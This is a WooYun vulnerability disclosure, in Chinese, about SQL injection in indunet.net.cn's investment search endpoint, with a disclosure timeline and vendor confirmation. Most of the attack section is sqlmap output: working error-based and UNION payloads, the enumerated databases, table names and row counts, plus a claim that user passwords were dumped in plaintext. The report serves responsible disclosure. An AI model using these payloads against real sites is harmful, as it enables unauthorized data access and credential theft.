乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-01: 细节已通知厂商并且等待厂商处理中 2015-04-03: 厂商已经确认,细节仅向厂商公开 2015-04-13: 细节向核心白帽子及相关领域专家公开 2015-04-23: 细节向普通白帽子公开 2015-05-03: 细节向实习白帽子公开 2015-05-18: 细节向公众公开
中国工业网(www.indunet.net.cn)作为工业网络传媒的开创者、领导者,是在有关政府部门和行业协会的大力支持下发展起来的国内最具影响力的工业门户网站,是中工集团旗下的核心信息服务型高新技术企业。 中国工业网开发并运营了国家履行《禁止化学武器公约》工作办公室官方网站和履约信息管理系统,同时与亚洲制造业协会、品牌中国等100多家行业机构开展了全面战略合作。截止到2012年底,中国工业网拥有企业会员20万余家,个人会员80万人,合作协会100多家,合作媒体近千家。 中国工业网秉承“梦想、责任、价值”的理念,创造了独特的工业信息平台及服务模式,是业内公认的权威资讯传媒。目前已被各大知名搜索工具排到本行业网站首位,成为工业界老板和商务、市场、技术、设计人员每日必上的网站和首选商业工具。
1、继续寻找,又找到一个搜索有注入的地方,而且这个搜索处所有的参数都存在SQL注入
http://www.indunet.net.cn/news/
2、POST数据
http://www.indunet.net.cn/info/investment!searchlist.action (POST)keyboard=12&searchfield=intitle&Submit722=%CB%D1%CB%F7
3、sqlmap测试
sqlmap identified the following injection points with a total of 268 HTTP(s) requests:---Place: POSTParameter: keyboard Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: keyboard=12' AND (SELECT 2761 FROM(SELECT COUNT(*),CONCAT(0x7163626b71,(SELECT (CASE WHEN (2761=2761) THEN 1 ELSE 0 END)),0x71676e7271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WUfa'='WUfa&searchfield=intitle&Submit722=%CB%D1%CB%F7 Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: keyboard=12' UNION ALL SELECT CONCAT(0x7163626b71,0x42634c52674142484e52,0x71676e7271)#&searchfield=intitle&Submit722=%CB%D1%CB%F7Place: POSTParameter: searchfield Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: keyboard=12&searchfield=intitle AND (SELECT 9852 FROM(SELECT COUNT(*),CONCAT(0x7163626b71,(SELECT (CASE WHEN (9852=9852) THEN 1 ELSE 0 END)),0x71676e7271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Submit722=%CB%D1%CB%F7 Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: keyboard=12&searchfield=intitle UNION ALL SELECT CONCAT(0x7163626b71,0x566e6974616a4e4f7273,0x71676e7271)#&Submit722=%CB%D1%CB%F7---web application technology: Servlet 2.4, Tomcat 4.2.3.back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: keyboard Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: keyboard=12' AND (SELECT 2761 FROM(SELECT COUNT(*),CONCAT(0x7163626b71,(SELECT (CASE WHEN (2761=2761) THEN 1 ELSE 0 END)),0x71676e7271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WUfa'='WUfa&searchfield=intitle&Submit722=%CB%D1%CB%F7 Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: keyboard=12' UNION ALL SELECT CONCAT(0x7163626b71,0x42634c52674142484e52,0x71676e7271)#&searchfield=intitle&Submit722=%CB%D1%CB%F7Place: POSTParameter: searchfield Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: keyboard=12&searchfield=intitle AND (SELECT 9852 FROM(SELECT COUNT(*),CONCAT(0x7163626b71,(SELECT (CASE WHEN (9852=9852) THEN 1 ELSE 0 END)),0x71676e7271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Submit722=%CB%D1%CB%F7 Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: keyboard=12&searchfield=intitle UNION ALL SELECT CONCAT(0x7163626b71,0x566e6974616a4e4f7273,0x71676e7271)#&Submit722=%CB%D1%CB%F7---web application technology: Servlet 2.4, Tomcat 4.2.3.back-end DBMS: MySQL >= 5.0.0current user: 'root@localhost'current database: 'gyw'-----------------available databases [5]:[*] gyw[*] information_schema[*] mysql[*] test[*] yygtest-----------------------web application technology: Servlet 2.4, Tomcat 4.2.3.back-end DBMS: MySQL >= 5.0.0Database: gyw[127 tables]+------------------------------+| T_ANCS_SYSTEM_Entity || T_ANCS_SYSTEM_FUNCTIONTREE || T_ANCS_SYSTEM_GROUPINFO || T_ANCS_SYSTEM_INFO || T_ANCS_SYSTEM_InfoChild || T_ANCS_SYSTEM_PERMISSION || T_ANCS_SYSTEM_ROLEINFO || T_ANCS_SYSTEM_RoleData || T_ANCS_SYSTEM_RolePermission || T_ANCS_SYSTEM_RoleRules || T_ANCS_SYSTEM_Rules || T_ANCS_SYSTEM_USERGROUP || T_ANCS_SYSTEM_USERINFO || T_ANCS_SYSTEM_UserRelations || T_ANCS_SYSTEM_UserRole || T_Blog_Album || T_Blog_Article || T_Blog_Class || T_Blog_Friend || T_Blog_Info || T_Blog_Liuyan || T_Blog_Message || T_Blog_Photos || T_Blog_Review || T_Blog_SystemSet || T_EditArticle || T_Edituser || T_EdituserLanmu || T_FANKUIBEAN || T_ORDERBEAN || T_SHOPBEAN || T_SHOPBEAND || T_app_UserOnline || T_app_jifen || T_app_jifenmx || T_app_touxian || T_bbs_bbsarticle || T_bbs_bbsfriend || T_bbs_bbsmessage || T_bbs_bbsuserinfo || T_bbs_diaocha || T_bbs_forum || T_bbs_forumgroup || T_bbs_forumowner || T_bbs_guanggao || T_bbs_link || T_bbs_lockip || T_bbs_lockwords || T_bbs_message || T_bbs_touxian || T_ci_Business || T_ci_EnBusiness || T_ci_Leavemessage || T_ci_Menu || T_ci_MenuUser || T_ci_Message || T_ci_Question || T_ci_Shoucang || T_ci_TenderLeavemessage || T_ci_TenderSearchObject || T_ci_TenderUser || T_ci_Tongxun || T_ci_Tougao || T_ci_Wenjuan || T_ci_Zhanhui || T_ci_Zixun || T_ci_app_Article || T_ci_app_EditArticle || T_ci_app_InduDown || T_ci_app_Keyword || T_ci_app_Magazine || T_ci_app_Media || T_ci_app_Medium || T_ci_app_Message || T_ci_app_Mulu || T_ci_app_Pinglun || T_ci_app_Qishu || T_ci_app_RoleInfoChild || T_ci_app_ShiPing || T_ci_app_Tc || T_ci_app_Tcitem || T_ci_app_ad || T_ci_app_adsub || T_ci_app_anxe || T_ci_app_articletype || T_ci_app_enArticle || T_ci_app_enlamu || T_ci_app_enproduct || T_ci_app_entype || T_ci_app_jobFound || T_ci_app_lunwen || T_ci_app_popele || T_ci_app_product || T_ci_app_resume || T_ci_app_sou || T_ci_app_tecFound || T_ci_yuanquuser || T_cms_Agent || T_cms_Buy || T_cms_Cooperation || T_cms_Investment || T_cms_Leave || T_cms_Supply || T_cms_Tender || T_companyArticle || T_dydq_app_anxe || T_information || T_jizhe || T_job || T_jobArticle || T_project || T_quanzi_mulu || T_quanzi_zu || T_quanzi_zuarticle || T_quanzi_zuarticlePinglun || T_quanzi_zusoucang || T_quanzi_zutongzhi || T_quanzi_zuuser || T_tech || T_yuanqu || T_zazhi || T_zhuanjia || foofoofoo || grand || kttype || news || rttype |+------------------------------+Database: gyw+------------------------------+---------+| Table | Entries |+------------------------------+---------+| T_cms_Investment | 689523 || T_cms_Agent | 575161 || T_bbs_bbsuserinfo | 350588 || T_ci_app_anxe | 200891 || T_bbs_bbsarticle | 144958 || T_cms_Supply | 122536 || T_ci_app_adsub | 119526 || T_ci_app_Article | 108055 || T_ci_Zhanhui | 70583 || T_ANCS_SYSTEM_USERINFO | 57389 || T_app_jifenmx | 57091 || T_ci_Business | 29795 || T_companyArticle | 5027 || grand | 4988 || kttype | 4823 || T_EditArticle | 4188 || T_ci_app_enArticle | 3944 || T_ci_app_popele | 2498 || T_job | 2301 || T_cms_Buy | 1923 || T_ci_app_Pinglun | 1495 || T_tech | 1191 || T_ci_app_ad | 1161 || T_cms_Cooperation | 1087 || T_bbs_diaocha | 660 || T_ci_MenuUser | 597 || T_ci_app_Media | 583 || T_ci_Leavemessage | 504 || T_ANCS_SYSTEM_UserRole | 484 || T_ci_Message | 429 || T_bbs_link | 416 || T_ci_app_resume | 416 || T_ANCS_SYSTEM_InfoChild | 358 || T_ci_app_enproduct | 313 || rttype | 236 || T_yuanqu | 220 || T_ci_Tougao | 168 || T_ci_EnBusiness | 164 || T_ci_app_Keyword | 158 || T_ci_app_RoleInfoChild | 142 || T_ci_Zixun | 137 || T_ci_app_entype | 126 || T_zhuanjia | 105 || T_bbs_forumowner | 87 || T_ci_app_InduDown | 78 || T_ci_Tongxun | 60 || T_EdituserLanmu | 60 || T_ci_Wenjuan | 57 || T_ci_yuanquuser | 55 || T_ci_app_jobFound | 44 || T_ANCS_SYSTEM_RolePermission | 42 || T_ANCS_SYSTEM_FUNCTIONTREE | 41 || T_bbs_forum | 41 || T_zazhi | 39 || T_ANCS_SYSTEM_INFO | 36 || T_ci_Menu | 36 || T_ANCS_SYSTEM_USERGROUP | 35 || T_bbs_lockwords | 34 || T_bbs_bbsfriend | 33 || T_ANCS_SYSTEM_ROLEINFO | 32 || T_ci_app_tecFound | 21 || T_ci_Question | 17 || T_ci_Shoucang | 15 || T_bbs_message | 12 || T_ANCS_SYSTEM_PERMISSION | 11 || T_app_jifen | 10 || T_app_touxian | 6 || T_ci_app_enlamu | 6 || T_ci_app_sou | 6 || T_Edituser | 5 || T_ORDERBEAN | 5 || T_ANCS_SYSTEM_GROUPINFO | 4 || T_bbs_forumgroup | 4 || T_ci_app_Tcitem | 4 || T_bbs_bbsmessage | 3 || T_ci_TenderUser | 3 || T_Blog_Album | 1 || T_ci_app_Tc | 1 || T_ci_TenderLeavemessage | 1 || T_FANKUIBEAN | 1 |+------------------------------+---------+
4、这次随便dump了100个测试,明码显示密码有木有
过滤修复
危害等级:高
漏洞Rank:10
确认时间:2015-04-03 18:20
按照CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。
暂无